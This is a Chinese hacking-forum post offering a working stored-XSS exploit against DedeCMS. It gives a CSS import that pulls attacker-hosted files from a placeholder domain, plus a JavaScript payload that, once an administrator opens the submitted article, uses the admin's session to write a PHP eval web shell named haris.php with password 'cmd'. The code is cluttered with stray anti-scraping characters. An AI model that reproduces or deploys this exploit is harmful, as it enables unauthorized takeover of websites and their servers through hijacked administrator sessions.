找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
返回列表 发新帖
查看: 2028|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
  e5 T, U4 X2 ]% x. E' P4 d为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)8 {( Y( w+ f$ |2 P3 p
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。6 x& b! y0 s* w6 e
下面说说利用方法。5 K1 W2 \" x  }" |
条件有2个:$ K3 G2 N/ ]. N. ^1 X0 ]
1.开启注册
- x/ A! c* U3 u6 C6 z2.开启投稿0 m3 c+ E: `" U! Q+ M$ p9 \
注册会员----发表文章8 H2 N" _2 R) H% o" J# c
内容填写:( }% W: Z& t) a* o: p/ ]
复制代码3 \2 y& e/ V9 }6 Z4 X! p1 _
<style>@im\port'\http://xxx.com/xss.css';</style>
  W! A( N+ B3 A2 m+ @新建XSS.Css
6 ~% ?3 B6 H$ D+ m# m6 K$ M复制代码
. [) o: l/ n; V  t.body{/ x+ Z0 A# L- ?% X* S- }5 I3 Z5 D
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }+ z. H" S, j9 r
新建xss.js 内容为
, l5 s. A3 L4 }复制代码9 [: H( I7 ~2 X
1.var request = false;
# k3 W) b* ]: o  F- I/ l1 X) C2.if(window.XMLHttpRequest) {3 V" u/ [' n' E7 T/ f- P$ a. ^
3.request = new XMLHttpRequest();: T( i' _7 W" s* s  K6 ?
4.if(request.overrideMimeType) {
3 A$ r3 w1 t  L5.request.overrideMimeType('text/xml');. E6 X( Q2 D( N# i3 r, i- v$ G
6.}
  i0 I. N, Y7 ^! W( D( O7.} else if(window.ActiveXObject) {
! `  |! t. L$ C3 B* ]; u* I8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];" l  [0 a5 h0 P
9.for(var i=0; i<versions.length; i++) {& y+ y- R3 f' R* {) r+ |1 P
10.try {
+ k3 J+ |9 w1 R9 m11.request = new ActiveXObject(versions);, Z1 R) }$ ^) `  r: D
12.} catch(e) {}
  g/ y$ P$ t& O5 o13.}
7 q! u! O3 w3 h3 o: ?; }& ^; U" e14.}6 ]$ ^7 b5 v4 c% I1 s4 b4 g! D& u# t
15.xmlhttp=request;
+ S- U% K: E  J( {6 ~  P- J16.function getFolder( url ){
* {8 V+ b  F/ V& N17. obj = url.split('/')
$ T% O6 f+ [! ^" C$ h18. return obj[obj.length-2]) `! E" k3 F  j; |. P$ p
19.}/ @' C6 |. m& o5 _5 Z
20.oUrl = top.location.href;
7 ~4 K% d5 @9 q" o+ B. w21.u = getFolder(oUrl);: R. G# s9 G" ~% `' }  _8 F
22.add_admin();: ~( Z1 E) W/ [* }7 R
23.function add_admin(){- u7 |* J$ C' s: j4 z$ ~
24.var url= "/"+u+"/sys_sql_query.php";  l1 C4 X1 ^3 S& H
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
/ {' M0 O5 ]4 q+ b26.xmlhttp.open("POST", url, true);
7 t+ O) k# V5 k4 z: ^* P, v27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
2 Y4 b, M; ]1 P% ^) A28.xmlhttp.setRequestHeader("Content-length", params.length);
8 m: e& T& [6 ]) O- d3 `29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
) B( x3 Z3 Y! ^0 B5 ^* z* f30.xmlhttp.send(params);
9 ^4 W& L/ ?, C31.}
. g$ y. _3 n' z3 Z当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表